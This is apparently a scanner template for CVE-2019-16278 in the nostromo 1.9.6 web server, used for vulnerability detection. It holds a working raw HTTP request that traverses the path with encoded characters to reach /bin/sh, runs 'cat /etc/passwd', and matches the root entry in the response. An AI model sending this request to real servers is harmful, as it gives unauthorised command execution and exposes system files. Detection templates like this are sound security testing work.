id: CVE-2019-16278 info: author: pikpikcu name: nostromo 1.9.6 - Remote Code Execution severity: critical # Source: https://www.exploit-db.com/raw/47837 requests: - raw: - | POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Content-Length: 1 Connection: close echo echo cat /etc/passwd 2>&1 matchers: - type: regex regex: - "root:[x*]:0:0:"